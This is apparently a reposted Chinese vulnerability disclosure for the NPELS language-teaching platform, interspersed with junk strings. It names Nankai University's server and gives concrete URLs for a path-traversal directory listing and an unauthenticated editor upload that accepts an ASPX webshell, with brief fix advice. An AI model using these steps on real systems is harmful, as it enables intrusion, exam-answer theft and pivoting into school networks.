新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
/ Y: g* X# p3 E- l. j
详细说明：
3 O1 l( H- J2 ^% C
/ I) l- @9 d& ~7 e4 z/ `) n3 z以南开大学的为例:
http://222.30.60.3/NPELS
. M% h9 ^+ u& ?- I  E1 M4 {8 FNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
5 ]( X8 k9 B; ]+ z5 a1 N, I<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
4 [- @) @9 V* j7 J) p7 P</setting>
% A5 W6 i* y7 o: ?0 {$ Q及版本号
$ v, I" ^5 }2 h( v# B& v. j<add key="TVersion" value="1, 0, 0, 2187">
- q8 @8 a: X/ q</add>
直接访问
+ V1 z% A& E5 ~% e: ]9 H3 ihttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
" {* E6 n2 G* @  ghttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
/ ]* T3 Y5 K1 h! K进一步列目录（返回的网页很大，可以直接 wget 下来）
4 [4 b0 d( q8 ^http://222.30.60.3/NPELS/CommonS ... List?version=../../
4 C% ^: `0 r$ t. R& J+ Q
发现
2 X* V' a9 e4 @% a4 R/ Ehttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
6 _/ f+ g& I/ C可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
7 I; r* {" f! I' |# P
# ]' W8 x2 I5 C; m' t* G" Y1 \OOXX

/ F& i$ V% W+ zGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
- _9 p% M9 ^9 m; j8 D漏洞证明：

" ~$ F4 e  k# ?- d列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
9 I$ S; V8 z3 m: ^1 o. A3 j/ W0 V4 m文件上传：
  k  U1 O* t# t, `# c; vhttp://222.30.60.3/npelsv/editor/editor.htm

上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

  U; p1 F3 l$ W* k4 K修复方案：
好像考试系统必须使用 CommonService.asmx
$ Y  t# w1 Z7 O2 ?5 D4 c* J: X2 i最好配置文件加密或者用别的方式不让它泄露出来
+ ~1 ], e3 N1 @& c% v并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
% C" ^+ H% y" `4 ?3 o